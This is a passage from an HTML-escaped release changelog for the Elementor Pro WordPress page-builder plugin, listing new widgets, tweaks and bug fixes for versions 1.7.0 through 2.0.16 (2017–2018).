Document<\\/li>\\n<\\/ul>\\n<h4>2.0.16 - 2018-07-16<\\/h4>\\n<ul>\\n<li>Tweak: CSS Filter Control module is now included in Elementor<\\/li>\\n<li>Fix: Border gap in Portfolio widget when item gap set as <code>0<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5077\\\">#5077<\\/a>)<\\/li>\\n<li>Fix: Restore current query after get Global Widget data<\\/li>\\n<li>Fix: Add action item in History on unlink Global widget<\\/li>\\n<\\/ul>\\n<h4>2.0.15 - 2018-07-10<\\/h4>\\n<ul>\\n<li>Fix: Dropdown menu items collapsing when activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4996\\\">#4996<\\/a>)<\\/li>\\n<li>Fix: GMT offset in Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4997\\\">#4997<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.0.14 - 2018-07-08<\\/h4>\\n<ul>\\n<li>Tweak: Added set method to form record for developers (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4983\\\">#4983<\\/a>)<\\/li>\\n<li>Fix: Autoplay option for Carousels<\\/li>\\n<li>Fix: Close mobile menu on item click in the Nav Menu widget<\\/li>\\n<\\/ul>\\n<h4>2.0.13 - 2018-07-03<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for Elementor v2.1<\\/li>\\n<\\/ul>\\n<h4>2.0.12 - 2018-07-02<\\/h4>\\n<ul>\\n<li>Fix: Global widget PHP notices<\\/li>\\n<li>Fix: Slides widget active slide lost focus when clicking Editor tabs<\\/li>\\n<li>Fix: Form select field send all selected values on multiple selection<\\/li>\\n<li>Fix: Validate time field only if it's not empty<\\/li>\\n<li>Fix: ConvertKit API not saving name field<\\/li>\\n<\\/ul>\\n<h4>2.0.11 - 2018-06-12<\\/h4>\\n<ul>\\n<li>Fix: Theme Builder <code>author<\\/code> archive condition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4593\\\">#4593<\\/a>)<\\/li>\\n<li>Fix: Respect password protected posts in Post Content widget<\\/li>\\n<li>Fix: Custom Fonts redirect to post edit screen in edge cases.<\\/li>\\n<\\/ul>\\n<h4>2.0.10 - 2018-06-05<\\/h4>\\n<ul>\\n<li>Tweak: Added <code>elementor\\/theme\\/get_location_templates\\/template_id<\\/code> filter hook for multi-language plugins<\\/li>\\n<li>Fix: Dynamic Post Terms missing taxonomies if the taxonomy is registered to more then one post types (#4386)<\\/li>\\n<li>Fix: Fields shortcode missing after removing a field in Form widget<\\/li>\\n<li>Deprecated: <code>get_theme_templates_by_location<\\/code> is replaced by <code>get_location_templates<\\/code><\\/li>\\n<\\/ul>\\n<h4>2.0.9 - 2018-05-28<\\/h4>\\n<ul>\\n<li>Fix: Compatibility for PHP version 5.4<\\/li>\\n<\\/ul>\\n<h4>2.0.8 - 2018-05-28<\\/h4>\\n<ul>\\n<li>Tweak: Added Active state for Nav Menu dropdown<\\/li>\\n<li>Tweak: Added style for "Nothing Found" Message for Archive Posts widget<\\/li>\\n<li>Tweak: Removed caption control in Site Logo widget<\\/li>\\n<li>Tweak: Added option to position currency symbol before\\/after In Price Table widget<\\/li>\\n<li>Fix: Query control manual selection does not show more than 10 items (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4479\\\">#4479<\\/a>)<\\/li>\\n<li>Fix: Styling glitch with terms list in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4342\\\">#4342<\\/a>)<\\/li>\\n<li>Fix: Sub terms missing in Query control in edge cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4527\\\">#4527<\\/a>)<\\/li>\\n<li>Fix: Avoid rendering a template if it's not published<\\/li>\\n<li>Fix: 404 Page style not working<\\/li>\\n<li>Fix: Price Table button with hover animation not working in editor<\\/li>\\n<li>Fix: Styling conflict in Call to Action widget<\\/li>\\n<li>Fix: Global Widget tab translation<\\/li>\\n<li>Fix: Adding parent wrapper class to Site Title widget<\\/li>\\n<\\/ul>\\n<h4>2.0.7 - 2018-05-16<\\/h4>\\n<ul>\\n<li>Fix: Content not found on section when single is set to "All Singular"<\\/li>\\n<li>Fix: Open 404 template library for 404 page<\\/li>\\n<li>Tweak: Added CSS prefix for dev files<\\/li>\\n<li>Tweak: Removed product post type from display conditions<\\/li>\\n<\\/ul>\\n<h4>2.0.6 - 2018-05-15<\\/h4>\\n<ul>\\n<li>Tweak: Set type on create new single template<\\/li>\\n<li>Tweak: Always show the conditions dialog in the Draft status<\\/li>\\n<li>Tweak: Added document type <code>widget<\\/code><\\/li>\\n<li>Tweak: Added Post Custom Field tag to URL category<\\/li>\\n<li>Fix: When ACF Field Groups are Empty (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4428\\\">#4428<\\/a>)<\\/li>\\n<li>Fix: Links inside carousel in edge cases<\\/li>\\n<li>Fix: Responsive issue in My Templates area<\\/li>\\n<li>Fix: Image alignment for post content with text alignment<\\/li>\\n<li>Fix: Post Content widget when preview post is missing<\\/li>\\n<li>Fix: Global Widget tab translation<\\/li>\\n<li>Fix: Style settings for Post \\/ Archive Title widgets<\\/li>\\n<\\/ul>\\n<h4>2.0.5 - 2018-05-08<\\/h4>\\n<ul>\\n<li>Fix: Creating a CPT with name like document-type breaks the editor (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4203\\\">#4203<\\/a>)<\\/li>\\n<li>Fix: Added support for new version of reCAPTCHA<\\/li>\\n<li>Fix: Added fallback for controls after <code>post_status<\\/code><\\/li>\\n<li>Fix: Required field in forms widget<\\/li>\\n<li>Fix: Media Carousel in the Coverflow skin<\\/li>\\n<li>Fix: 404 Page show wrong template in edge cases<\\/li>\\n<li>Fix: Save the default menu in the Nav Menu widget<\\/li>\\n<\\/ul>\\n<h4>2.0.4 - 2018-05-02<\\/h4>\\n<ul>\\n<li>Tweak: Added parent's class for extended widgets<\\/li>\\n<li>Tweak: Set entire-site as default to avoid conflict with save without conditions<\\/li>\\n<li>Tweak: Initialize global model when it's needed<\\/li>\\n<li>Tweak: Removed some duplicate strings<\\/li>\\n<li>Tweak: Query control now includes empty terms<\\/li>\\n<li>Tweak: Design polish for conditions dialog<\\/li>\\n<li>Tweak: Decreasing <code>minimumInputLength<\\/code> to 1 of select2<\\/li>\\n<li>Fix: Editor not loading for single templates in edge cases<\\/li>\\n<li>Fix: Select2 in Safari takes it's time to get the original select width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4310\\\">#4310<\\/a>)<\\/li>\\n<li>Fix: Slides per view not working for some effects<\\/li>\\n<li>Fix: New slides not showing in the editor<\\/li>\\n<li>Fix: Editor for section without a defined location, defaults to content area<\\/li>\\n<\\/ul>\\n<h4>2.0.3 - 2018-04-24<\\/h4>\\n<ul>\\n<li>Tweak: Optimize CSS for Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4214\\\">#4214<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4216\\\">#4216<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4225\\\">#4225<\\/a>)<\\/li>\\n<li>Fix: Double render on frontend view in core locations<\\/li>\\n<li>Fix: Masonry not working in edge cases<\\/li>\\n<li>Fix: Added default setting for Author Info tag<\\/li>\\n<\\/ul>\\n<h4>2.0.2 - 2018-04-18<\\/h4>\\n<ul>\\n<li>Fix: Regenerate conditions to include all templates<\\/li>\\n<\\/ul>\\n<h4>2.0.1 - 2018-04-17<\\/h4>\\n<ul>\\n<li>Tweak: Added div wrapper for Nothing Found massage (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4136\\\">#4136<\\/a>)<\\/li>\\n<li>Tweak: Show empty categories in Query Control & Display Conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4127\\\">#4127<\\/a>)<\\/li>\\n<li>Tweak: Added Divider control for Post Info widget<\\/li>\\n<li>Fix: Update admin links in Yoast Breadcrumbs widget<\\/li>\\n<li>Fix: Sticky element conflict with clearfix CSS<\\/li>\\n<li>Fix: Compatibility for PHP version 5.4.32 & 5.5.16 and below<\\/li>\\n<li>Fix: Avoid running <code>wp_head<\\/code> hooks twice<\\/li>\\n<\\/ul>\\n<h4>2.0.0 - 2018-04-16<\\/h4>\\n<ul>\\n<li>New: Introducing Theme Builder - <a href=\\\"https:\\/\\/elementor.com\\/introducing-theme-builder\\/\\\">Release Post<\\/a> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/417\\\">#417<\\/a>)<\\/li>\\n<li>New: Introducing Locations API to inject custom location templates<\\/li>\\n<li>New: Introducing Display Conditions for all dynamic templates<\\/li>\\n<li>New: Introducing Dynamic Tag feature - a new way to add dynamic content to your design<\\/li>\\n<li>New: Introducing Role manager to allow "Content Only mode" (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/483\\\">#483<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/653\\\">#653<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/885\\\">#885<\\/a>)<\\/li>\\n<li>New: Introducing 9 new dynamic widgets: Archive Posts, Archive Title, Post Content, Post Info, Post Title, Post Excerpt, Featured Image, Site Logo & Site Name (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/543\\\">#543<\\/a>)<\\/li>\\n<li>New: Introducing Developers area with guides and API documentation - <a href=\\\"https:\\/\\/elementor.com\\/introducing-elementor-developer-api\\/\\\">Release Post<\\/a> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/451\\\">#451<\\/a>)<\\/li>\\n<li>New: Introducing <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor-hello-theme\\\">Elementor Hello Theme<\\/a> - A demonstration theme for developers<\\/li>\\n<li>New: Added new type of templates: Header, Footer, Single and Archive (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2761\\\">#2761<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2623\\\">#2623<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2109\\\">#2109<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2061\\\">#2061<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2439\\\">#2439<\\/a>)<\\/li>\\n<li>New: Design 404 page with Single template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1558\\\">#1558<\\/a>)<\\/li>\\n<li>New: Design Search Results with Archive template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3196\\\">#3196<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2590\\\">#2590<\\/a>)<\\/li>\\n<li>New: Added Scrolling Effect for sections including <em>Sticky Element<\\/em> per device (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2412\\\">#2412<\\/a>)<\\/li>\\n<li>New: Integration with Custom Fields (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2054\\\">#2054<\\/a>)<\\/li>\\n<li>New: Partial support for Toolset integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2949\\\">#2949<\\/a>)<\\/li>\\n<li>New: Partial support for Pods integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2169\\\">#2169<\\/a>)<\\/li>\\n<li>New: Partial support for ACF integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2041\\\">#2041<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2059\\\">#2059<\\/a>)<\\/li>\\n<li>Tweak: Add custom fields support for ActiveCampaign (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3531\\\">#3531<\\/a>)<\\/li>\\n<li>Tweak: Allow brackets in Forms Tel field<\\/li>\\n<li>Tweak: Added currency format control for Price Table widget<\\/li>\\n<li>Tweak: Reduced API request for some servers<\\/li>\\n<li>Fix: Dropdown <code>border-radius<\\/code> in Nav Menu widget<\\/li>\\n<li>Fix: Price List widget layout breaks in edge cases<\\/li>\\n<li>Note: This version requires Elementor v2.0.6<\\/li>\\n<\\/ul>\\n<h4>1.15.6 - 2018-03-28<\\/h4>\\n<ul>\\n<li>Fix: Removed duplicate Custom CSS section (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3938\\\">#3938<\\/a>)<\\/li>\\n<li>Fix: <code>box-shadow<\\/code> issue with cards skin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3940\\\">#3940<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.15.5 - 2018-03-27<\\/h4>\\n<ul>\\n<li>Fix: Added global widget compatibility for Elementor v2.0<\\/li>\\n<li>Fix: Reduced API request for some servers<\\/li>\\n<\\/ul>\\n<h4>1.15.4 - 2018-03-26<\\/h4>\\n<ul>\\n<li>Tweak: Allow brackets in phone field<\\/li>\\n<li>Tweak: Added compatibility with Yoast 7.0.+<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor v2.0<\\/li>\\n<li>Fix: Support for multiple carousel setting in editor<\\/li>\\n<li>Fix: <code>on_export<\\/code> issue in forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3890\\\">#3890<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.15.3 - 2018-03-07<\\/h4>\\n<ul>\\n<li>Tweak: Added unique class to field group div (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3595\\\">#3595<\\/a>)<\\/li>\\n<li>Fix: Screen Options missing when Pro is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3622\\\">#3622<\\/a>)<\\/li>\\n<li>Fix: Allow label styling even when <code>show labels<\\/code> is set hide (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3544\\\">#3544<\\/a>)<\\/li>\\n<li>Fix: Typography control not working in edge cases<\\/li>\\n<li>Fix: Safari compatibility for Search widget<\\/li>\\n<\\/ul>\\n<h4>1.15.2 - 2018-02-27<\\/h4>\\n<ul>\\n<li>Fix: Only add support mine-type if needed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3543\\\">#3543<\\/a>)<\\/li>\\n<li>Fix: Better support for Old Typekit kits<\\/li>\\n<\\/ul>\\n<h4>1.15.1 - 2018-02-21<\\/h4>\\n<ul>\\n<li>Tweak: Custom font title placeholder is not <code>enter font family<\\/code><\\/li>\\n<li>Tweak: Custom font title set as required<\\/li>\\n<li>Fix: Custom font, <code>font-face<\\/code> enqueued only once if used in global (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3513\\\">#3513<\\/a>)<\\/li>\\n<li>Fix: Added workaround for upload validation which relies on a PHP extension (fileinfo) with inconsistent reporting behavior.<\\/li>\\n<\\/ul>\\n<h4>1.15.0 - 2018-02-19<\\/h4>\\n<ul>\\n<li>New: Added custom fonts manager for self hosted fonts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/852\\\">#852<\\/a>)<\\/li>\\n<li>New: Integration with Adobe TypeKit fonts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/631\\\">#631<\\/a>)<\\/li>\\n<li>Tweak: Clear menu from Nav Menu widget on template export<\\/li>\\n<li>Tweak: Allow zero for GetResponse integration as <code>day of cycle<\\/code><\\/li>\\n<\\/ul>\\n<h4>1.14.2 - 2018-02-13<\\/h4>\\n<ul>\\n<li>Fix: Global widget content that got affected by previous update<\\/li>\\n<\\/ul>\\n<h4>1.14.1 - 2018-02-13<\\/h4>\\n<ul>\\n<li>Tweak: Added <code>none<\\/code> option to content animation in CTA widget<\\/li>\\n<li>Tweak: Added <code>form_id<\\/code> to ActiveCampaign integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3422\\\">#3422<\\/a>)<\\/li>\\n<li>Fix: Page crashed when Global widget not found.<\\/li>\\n<\\/ul>\\n<h4>1.14.0 - 2018-02-12<\\/h4>\\n<ul>\\n<li>New: Added Call to Action widget<\\/li>\\n<li>Tweak: MailPoet pull field mapping from MailPoet instead of hardcoded<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor v2.0<\\/li>\\n<li>Fix: Allow zero (0) to be accepted as a field value<\\/li>\\n<li>Fix: Login form when custom login URL is set<\\/li>\\n<li>Fix: Added Day of cycle control to GetResponse integration<\\/li>\\n<\\/ul>\\n<h4>1.13.2 - 2018-01-23<\\/h4>\\n<ul>\\n<li>Tweak: Added placeholder to Password field<\\/li>\\n<li>Tweak: Removed <code>subscriber_already_exists_message<\\/code> control to prevent potential data leakage<\\/li>\\n<li>Fix: MailPoet Subscriber Already Exists error validation against translated string directly from MailPoet<\\/li>\\n<li>Fix: Changed <code>imagesLoaded()<\\/code> to Vanilla JS to avoid compatibility issues with some themes<\\/li>\\n<li>Fix: Only validate Tel field if not empty<\\/li>\\n<li>Fix: Stop slider while editing<\\/li>\\n<\\/ul>\\n<h4>1.13.1 - 2018-01-16<\\/h4>\\n<ul>\\n<li>Fix: Added compatibility with old PHP versions<\\/li>\\n<\\/ul>\\n<h4>1.13.0 - 2018-01-16<\\/h4>\\n<ul>\\n<li>New: Added File Upload field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1482\\\">#1482<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2974\\\">#2974<\\/a>)<\\/li>\\n<li>New: Added Acceptance field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1693\\\">#1693<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2974\\\">#2974<\\/a>)<\\/li>\\n<li>New: Added Date field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1868\\\">#1868<\\/a>)<\\/li>\\n<li>New: Added Time field for Forms widget<\\/li>\\n<li>New: Added Password field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2164\\\">#2164<\\/a>)<\\/li>\\n<li>New: Added HTML field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1500\\\">#1500<\\/a>)<\\/li>\\n<li>Tweak: Added characters validation for Tel field<\\/li>\\n<li>Tweak: Added min & max validation for Number field<\\/li>\\n<li>Tweak: Added multiple selection for Select field<\\/li>\\n<li>Tweak: Added donReach integration for Share Buttons widget<\\/li>\\n<\\/ul>\\n<h4>1.12.3 - 2018-01-09<\\/h4>\\n<ul>\\n<li>Fix: Render element plain content instead of parsed content when not needed in global widget<\\/li>\\n<li>Fix: Apply <code>url-encoding<\\/code> to "Tweet" button text in Blockquote widget to prevent unexpected corruption of the tweet text<\\/li>\\n<li>Fix: Removed My Account link from dashboard widget<\\/li>\\n<\\/ul>\\n<h4>1.12.2 - 2018-01-03<\\/h4>\\n<ul>\\n<li>Tweak: Added animation none for Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2964\\\">#2964<\\/a>)<\\/li>\\n<li>Fix: Active license button style<\\/li>\\n<\\/ul>\\n<h4>1.12.1 - 2018-01-02<\\/h4>\\n<ul>\\n<li>Tweak: Removed theme-element widgets from plain content<\\/li>\\n<li>Tweak: Set all theme-element widgets to extend same widget Base<\\/li>\\n<li>Tweak: Removed credit URL in forms meta data<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor v1.9<\\/li>\\n<li>Fix: Validate Get response Error as real error<\\/li>\\n<li>Fix: Removed responsive height control from Facebook Page widget<\\/li>\\n<\\/ul>\\n<h4>1.12.0 - 2017-12-20<\\/h4>\\n<ul>\\n<li>New: Added Drip integration to Forms<\\/li>\\n<li>New: Added ActiveCampaign integration to Forms<\\/li>\\n<li>New: Added ConverKit integration to Forms<\\/li>\\n<li>New: Added GetResponse integration to Forms<\\/li>\\n<li>New: Added form <code>id<\\/code>, <code>name<\\/code> attributes to handle integration with auto collectors like HubSpot<\\/li>\\n<li>New: Added Global API key for MailChimp to improve the workflow<\\/li>\\n<li>Tweak: Better error handling and message display for Forms<\\/li>\\n<li>Fix: PHP notice Undefined variable <code>$cc_header<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2934\\\">#2934<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.11.0 - 2017-12-11<\\/h4>\\n<ul>\\n<li>New: Added a native Comments widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/543\\\">#543<\\/a>)<\\/li>\\n<li>New: Added an Author Box widget<\\/li>\\n<li>New: Added a Post Navigation widget<\\/li>\\n<li>New: Added a Yoast Breadcrumbs widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2749\\\">#2749<\\/a>)<\\/li>\\n<li>Tweak: Added a close button to search widget under Full Screen skin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2762\\\">#2762<\\/a>)<\\/li>\\n<li>Fix: Allow currency symbol to appear even if price isn't numeric<\\/li>\\n<li>Fix: Edge cases when the nav menu is empty in a stretched section<\\/li>\\n<li>Fix: Added fallback when you remove the <code>space-between<\\/code> on Swiper carousel<\\/li>\\n<\\/ul>\\n<h4>1.10.2 - 2017-12-03<\\/h4>\\n<ul>\\n<li>Fix: Missing save widget icon (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2878\\\">#2878<\\/a>)<\\/li>\\n<li>Fix: Global widgets not saving edits (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2874\\\">#2874<\\/a>)<\\/li>\\n<li>Fix: Removed <code>white-space: nowrap;<\\/code> property from vertical menu in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2815\\\">#2815<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.10.1 - 2017-11-30<\\/h4>\\n<ul>\\n<li>Tweak: Added default value for search form<\\/li>\\n<li>Tweak: Order template list A-Z in the library widget<\\/li>\\n<li>Tweak: get_users\\/authors query is now done using AJAX only, for better performance in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2865\\\">#2865<\\/a>)<\\/li>\\n<li>Fix: When adding <code>.00<\\/code> it is not displayed on the front<\\/li>\\n<li>Fix: Make sure space between is numeric for carousel control<\\/li>\\n<li>Fix: Added space for radio & checkbox fields in form widget<\\/li>\\n<\\/ul>\\n<h4>1.10.0 - 2017-11-15<\\/h4>\\n<ul>\\n<li>New: Added native Search form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2576\\\">#2576<\\/a>)<\\/li>\\n<li>Tweak: Added Slides To Scroll & Loop controls to Media Carousel and Testimonials widgets<\\/li>\\n<li>Tweak: Added Inline editing to Blockquote widget<\\/li>\\n<li>Fix: Animated Headline color bug (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2516\\\">#2516<\\/a>)<\\/li>\\n<li>Fix: Animated Headline with Rotating skin<\\/li>\\n<li>Fix: RTL fix for Animated Headline widget in 'typing' and 'clip' animations<\\/li>\\n<li>Fix: Empty menu cause jQuery to crash in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2662\\\">#2662<\\/a>)<\\/li>\\n<li>Fix: Custom CSS gone after reloading the editor<\\/li>\\n<\\/ul>\\n<h4>1.9.5 - 2017-10-27<\\/h4>\\n<ul>\\n<li>Fix: Broken Global widget with JS (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2639\\\">#2639<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.9.4 - 2017-10-24<\\/h4>\\n<ul>\\n<li>Tweak: Improved UI for notices and license page<\\/li>\\n<li>Fix: Update system conflict with other EDD plugins<\\/li>\\n<li>Fix: WooCommerce frontend hooks on Elementor editor (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2577\\\">#2577<\\/a>)<\\/li>\\n<li>Fix: Removed default border left in Nav Menu dropdown CSS (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2496\\\">#2496<\\/a>)<\\/li>\\n<li>Fix: Increased submenu max-width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2558\\\">#2558<\\/a>)<\\/li>\\n<li>Fix: Save global templates without their defaults<\\/li>\\n<li>Fix: Horizontal scrolling issue with posts grid<\\/li>\\n<\\/ul>\\n<h4>1.9.3 - 2017-10-03<\\/h4>\\n<ul>\\n<li>Fix: Condition slide style that got affected by previous update<\\/li>\\n<\\/ul>\\n<h4>1.9.2 - 2017-10-02<\\/h4>\\n<ul>\\n<li>New: Added integration with MailPoet 3 for Forms actions<\\/li>\\n<li>Fix: Removed height control from Testimonial carousel in mobile editing mode<\\/li>\\n<li>Fix: Removed bottom padding when there's no pagination in Testimonial carousel<\\/li>\\n<li>Fix: Added condition for slides style section in skin bubble mode<\\/li>\\n<li>Fix: Slides per view control for mobile editing in Testimonial carousel<\\/li>\\n<li>Fix: Navigation Arrows icons matched with common Elementor Navigation Arrows<\\/li>\\n<\\/ul>\\n<h4>1.9.1 - 2017-09-28<\\/h4>\\n<ul>\\n<li>Fix: Slides per view for slideshow carousel<\\/li>\\n<li>Fix: Final polish for the new Testimonial Carousel widget<\\/li>\\n<li>Fix: Don't play video if slide type is not video<\\/li>\\n<li>Fix: Removed slides style section condition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2497\\\">#2497<\\/a>)<\\/li>\\n<li>Fix: Set cursor as pointer for slideshow thumbnails<\\/li>\\n<\\/ul>\\n<h4>1.9.0 - 2017-09-26<\\/h4>\\n<ul>\\n<li>New: Added Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/216\\\">#216<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/347\\\">#347<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2209\\\">#2209<\\/a>)<\\/li>\\n<li>New: Added Testimonial Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/715\\\">#715<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.8.3 - 2017-09-24<\\/h4>\\n<ul>\\n<li>Fix: Added compatibility for WordPress 4.8.2 & 4.7.6<\\/li>\\n<li>Fix: Remove slashes from Form sent data<\\/li>\\n<\\/ul>\\n<h4>1.8.2 - 2017-09-19<\\/h4>\\n<ul>\\n<li>Tweak: Added target URL for the tweet message in Blockquote widget<\\/li>\\n<li>Tweak: Render the slide height before the slider is finished loading<\\/li>\\n<li>Fix: Space between words for Animated Headline widget<\\/li>\\n<li>Fix: RTL compatibility for Animated Headline widget<\\/li>\\n<li>Fix: Italic font style for Animated Headline widget<\\/li>\\n<li>Fix: Excluded Menu widget from the WP Editor text rendering<\\/li>\\n<\\/ul>\\n<h4>1.8.1 - 2017-09-18<\\/h4>\\n<ul>\\n<li>Fix: WCAG Compatible "required" field attribute for W3C validation (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2391\\\">#2391<\\/a>)<\\/li>\\n<li>Fix: Print the main menu only when is necessary in Menu widget<\\/li>\\n<li>Fix: Use CSS media query instead of JS to hide items in Menu widget to avoid flickering on page load (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2381\\\">#2381<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.8.0 - 2017-09-12<\\/h4>\\n<ul>\\n<li>New: Added Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1406\\\">#1406<\\/a>)<\\/li>\\n<li>Fix: Field ID for checkbox control in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2279\\\">#2279<\\/a>)<\\/li>\\n<li>Fix: Style for Blockquote widget included<\\/li>\\n<\\/ul>\\n<h4>1.7.2 - 2017-09-07<\\/h4>\\n<ul>\\n<li>Tweak: Loading Facebook SDK via JS for better compatibility with caching plugins<\\/li>\\n<li>Fix: Responsive Embed Facebook post widget for Safari iOS (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2340\\\">#2340<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.7.1 - 2017-09-05<\\/h4>\\n<ul>\\n<li>Fix: Facebook SDK version<\\/li>\\n<\\/ul>\\n<h4>1.7.0 - 2017-09-05<\\/h4>\\n<ul>\\n<li>New: Added Facebook Button widget for Like, Recommend, Share and Follow<\\/li>\\n<li>New: Added Facebook Embed widget for Post, Video and Comment<\\/li>\\n<li>New: Added Facebook Comments widget<\\/li>\\n<li>New: Added Facebook Page widget (Previously known as Like Box)<\\/li>\\n<li>New: Added Blockquote widget with Tweet button<\\/li>\\n<li>Tweak: Added Facebook SDK integration for all Facebook widgets<\\/li>\\n<li>Fix: Animated headline rotating with long 